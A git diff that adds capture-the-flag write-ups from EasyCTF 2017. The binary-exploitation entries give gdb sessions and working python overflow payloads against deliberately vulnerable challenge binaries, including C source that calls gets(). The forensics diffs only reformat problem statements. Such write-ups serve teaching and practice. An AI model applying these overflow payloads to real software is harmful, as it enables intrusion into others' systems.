Merge branch 'master' of https://github.com/VoidMercy/easyctf-2017-writeups

Author: mzhang28

binary-exploitation/doubly-dangerous-110-points.md

@@ -0,0 +1,74 @@
+# Doubly Dangerous - 110 Points
+
+There seems to be an issue with [this](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/doubly-dangerous/doubly_dangerous?raw=true) binary. Can you exploit it?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
+
+We were given a binary.
+
+We first run it to see what it does
+
+```
+Give me a string: 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+nope!
+Segmentation fault
+```
+
+Seems like a buffer overflow because there was a segmentation fault. This means gets() was probably used, and gets() does not care about the length of the string we input. Now let's take a look at the code in gdb with
+
+```
+gdb doubly_dangerous
+set disassembly-flavor intel
+disas main
+```
+
+Here is the interesting instruction:
+
+```
+0x0804863c <+53>:    fld    DWORD PTR [ebp-0xc]
+0x0804863f <+56>:    fld    DWORD PTR ds:0x804876c
+0x08048645 <+62>:    fucomip st,st(1)
+```
+
+We can see that fucomip is being used, which is floating point instructions. We surmise that we need to make this compare return true. We can see that the value at 0x804876c is being compared to the value at ebp-0xc. Because we saw a segmentation fault, we know this consists of an overflow. We experiment with the amount of bytes to type until the value at ebp-0xc is overflowed.
+
+```
+python -c "print 'A'*69" > temp
+
+(gdb) r < temp
+...
+Breakpoint 1, 0x08048686 in main ()
+(gdb) x/10wx $ebp-0xc
+0xffffd0dc:     0x41414141      0xf7fc0041      0xffffd100      0x00000000
+0xffffd0ec:     0xf7e31a83      0x08048690      0x00000000      0x00000000
+0xffffd0fc:     0xf7e31a83      0x00000001
+```
+
+Alright, we can see that 69 characters overflows the content at ebp-0xc and 1 extra character. This means we need 64 characters to get the ebp-0xc, and then with the next four characters, we can control what value to place in $ebp-0xc. Now, we need to check what value to replace it with.
+
+```
+(gdb) x/10wx 0x804876c
+0x804876c:      0x41348000      0x3b031b01      0x00000030      0x00000005
+0x804877c:      0xfffffc60      0x0000004c      0xfffffe0b      0x00000070
+0x804878c:      0xfffffe97      0x00000090
+```
+
+We can see the value we need is 0x41348000. Now we can construct our exploit.
+
+```
+python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
+```
+
+```
+python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
+Give me a string: 
+Success! Here is your flag:
+easyctf{bofs_and_floats_are_d0uble_tr0uble!}
+```
+
+## Flag
+
+>easyctf{bofs_and_floats_are_d0uble_tr0uble!}

binary-exploitation/heaps-of-knowledge-420-points.md

@@ -58,5 +58,6 @@ Oh look it worked! Running it against the EasyCTF server nets us the flag:
 
 * [https://github.com/VulnHub/ctf-writeups/blob/master/2017/easyctf/heaps-of-knowledge.md](https://github.com/VulnHub/ctf-writeups/blob/master/2017/easyctf/heaps-of-knowledge.md)
 
+* [https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Heaps-of-Knowledge](https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Heaps-of-Knowledge)
 
 

binary-exploitation/simple-rop-120-points.md

@@ -0,0 +1,61 @@
+# Simple ROP - 120 Points
+
+Read flag.txt
+
+[Source](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/simple-rop/simple-rop.c)
+
+[Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/simple-rop/simple-rop?raw=true)
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
+
+We were given a binary and it's source code.
+
+```
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+
+void print_flag();
+void what_did_you_say();
+
+int main(int argc, char* argv[])
+{
+    gid_t gid = getegid();
+    setresgid(gid, gid, gid);
+    what_did_you_say();
+    return 0;
+}
+
+void print_flag()
+{
+    system("cat flag.txt");
+}
+
+void what_did_you_say()
+{
+    char buff[64];
+    gets(buff);
+    printf("You said: %s\n", buff);
+}
+```
+
+As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:
+
+>objdump -d simplerop | grep "print_flag"
+
+We find the address of print_flag to be: 0x804851a
+
+Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).
+
+```
+python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS
+
+python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS
+```
+
+## Flag
+
+>easyctf{r0p_7o_v1ct0ry}

forensics/bizarro-400-points.md

@@ -1,6 +1,10 @@
 # Bizarro - 400 Points
 
-#### phsst - VoidMercy's writeup
+Something seems very strange about [this](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/bizarro/crpt.png) strange looking image. Check it out?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 We were given an image.
 

forensics/flag-peg-150-points.md

@@ -1,6 +1,10 @@
 # Flag PEG - 150 Points
 
-#### phsst - VoidMercy's writeup
+We found a flag but it didn't do anything. Maybe you can find a better [flag](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/flag-peg/heresaflag.jpg)?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 We were given a .jpg file.
 

forensics/qr2-330-points.md

@@ -1,8 +1,10 @@
-#QR2 - 330 points
+# QR2 - 330 points
 
-#### phsst - VoidMercy's writeup
+When I am not practicing my [Oboe](https://en.wikipedia.org/wiki/Oboe) for band, I have been working on a QR code generator. For some reason, some of the images are not scannable. [Here](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/qr-2/qr2.bmp) is one, can you tell me what it says?
 
-We were given a broken QR code.
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 The problem mentioned that this problem is related to "OBOE" somehow. We search this up and find that OBOE can also stand for off by one error. We surmised that the off by one refers to the mask of the QR code, so we manually changed the mask of the QR code to see if it would decode. Sadly, none of the masks work. (See wikipedia for more information on masks).